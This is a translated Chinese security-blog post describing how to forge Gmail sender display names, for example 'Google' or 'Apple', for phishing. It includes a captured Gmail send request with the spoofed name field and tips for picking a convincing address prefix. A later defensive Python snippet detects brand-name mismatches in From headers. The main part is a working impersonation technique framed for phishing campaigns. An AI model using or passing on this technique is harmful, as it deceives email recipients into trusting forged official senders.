Bypassing Gmail authorization to impersonate official senders in phishing emails
2022-3-11 09:30:0 Author: mp.weixin.qq.com

Article source: 辛巴大佬

Fellow green-hat friends, I hear hvv is coming up, which means phishing season is coming too, so today I'm bringing you a Gmail phishing method.

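Because of some of Google's restrictions, certain special usernames cannot be registered at sign-up, for example ones containing special characters or the name Google.

By bypassing that restriction, however, the sender name on an email can be changed to read exactly "Google", "Apple" or another official name.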

Proof of concept:

Bypassing the restriction:

Capture the request while sending an email.

POST /sync/u/0/i/s?hl=zh-CN&c=22 HTTP/2
Host: mail.google.com
Cookie: COMPASS=x x x x x x x x x x x x x x x x x x x x x x x x x
Content-Length: 656
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
X-Framework-Xsrf-Token: xxxxxxxxxxxxxxxxxxxxx
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/json
X-Google-Btd: 1
X-Gmail-Btai: {"3":{"6":0,"10":1,"13":1,"15":0,"16":1,"17":1,"18":0,"19":1,"22":1,"23":1,"24":1,"25":1,"26":1,"27":1,"28":1,"29":0,"30":1,"31":1,"32":1,"33":1,"34":1,"35":0,"36":1,"37":"zh-CN","38":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36","39":1,"40":0,"41":25,"43":0,"44":1,"45":0,"46":1,"47":1,"48":1,"49":1,"50":1,"52":1,"53":1,"54":0,"55":1,"56":1,"57":0,"58":0,"60":0,"61":1,"62":0,"63":1,"64":1,"66":1,"67":1,"69":1,"70":0,"71":1,"72":0,"73":1},"5":"cef43d678f","7":25,"8":"gmail.pinto-server_20220225.06_p1","9":1,"10":5,"11":"","12":28800000,"13":"+08:00","14":1,"16":431522263,"17":"","18":"","19":"xxxxxxxxxxxxxxx","21":"11874"}
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
Origin: https://mail.google.com
X-Client-Data: xxxxxxxxxxxxxxxxxxx
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://mail.google.com/mail/u/0/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

{"2":{"1":[{"1":"5","2":{"1":"thread-a:r-xxxxxxxxxxx","2":{"14":{"1":{"1":"msg-a:r-xxxxxxxxxxx","2":{"1":1,"2":"[email protected]","3":"google","10":"[email protected]"},"3":[{"1":1,"2":"收件人@qq.com"}],"7":"xxxxxx","8":"hack by xinba","9":{"2":[{"1":0,"2":"<div dir=\"ltr\">1234</div>"}],"7":1},"11":["^all","^pfg","^f_bt","^f_btns","^f_cl","^a"],"18":"xxxxxxxxxxx","36":{"6":0},"37":{"4":0},"42":0,"43":{"1":0,"2":0,"3":0,"4":0},"52":"s:xxxxxxxxx|#msg-a:r-952505133084427487|0"},"3":1}}}}]},"3":{"1":1,"2":"11874","5":{"2":0},"7":1},"4":{"1":"xxxxxxxx","2":1,"3":"xxxxxxxxx","4":1,"5":70},"5":2}


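Look at the result and compare it with real emails from Apple and QQ Reading. By the way, I received the mail in a QQ mailbox; the "Google" at the very top is the email we just forged and sent.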

Then register a new email account and put some thought into the address prefix, and the phishing is steady and reliable.
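On the receiving side, the forged name and the crafted address prefix described above can both be caught by comparing the brand a From header claims with the domain it was actually sent from. The following is an added example, not code from the original post; the brand allow-list, the function names and every sample header are constructed assumptions.

```python
import unicodedata
from email.header import decode_header, make_header
from email.utils import parseaddr

# Assumed allow-list (constructed): brand name -> domains it really sends from.
BRAND_DOMAINS = {"google": {"google.com"}, "apple": {"apple.com"}}

def _norm(text):
    """Decode RFC 2047 encoded words, fold full-width/compatibility characters
    and case, and drop separators so "G o o g l e" still reads as "google"."""
    text = str(make_header(decode_header(text)))
    text = unicodedata.normalize("NFKC", text).casefold()
    return "".join(ch for ch in text if ch.isalnum())

def check_from(from_header):
    """Return (brand, sender_domain) when the display name or the local part
    claims a brand but the address domain is not one of that brand's domains;
    return None otherwise. Substring matching is deliberately broad."""
    name, addr = parseaddr(from_header)
    local, _, domain = addr.rpartition("@")
    domain = domain.casefold()
    shown, local = _norm(name), _norm(local)
    for brand, domains in BRAND_DOMAINS.items():
        if brand not in shown and brand not in local:
            continue  # this brand is not claimed anywhere in the header
        if not any(domain == d or domain.endswith("." + d) for d in domains):
            return brand, domain
    return None

# Constructed sample From headers (not taken from the original post).
SAMPLES = [
    "google <constructed.sender@gmail.com>",    # brand name, webmail domain
    "Apple <no_reply@email.apple.com>",         # brand name, brand subdomain
    "=?utf-8?q?Google?= <alerts@example.net>",  # RFC 2047 encoded display name
    "Ｇｏｏｇｌｅ Security <alerts@example.net>",  # full-width characters
    "Billing <apple.id.support@example.net>",   # brand only in the address prefix
    "Jane Doe <jane@example.org>",              # no brand claimed
]

if __name__ == "__main__":
    for header in SAMPLES:
        print(check_from(header), "<-", header)
```

NFKC folding covers full-width and compatibility forms only; look-alike letters from other scripts need a separate confusables mapping.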

Thanks, everyone. If you'd like to see future updates, please follow.



Article source: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650535039&idx=1&sn=b2a80e9e196f2c383a2c42ca9f60504f&chksm=83ba919bb4cd188d5f4abbee5b037040ec0e5e15c3b2c48def99c07d0334370698e4f50fca36#rd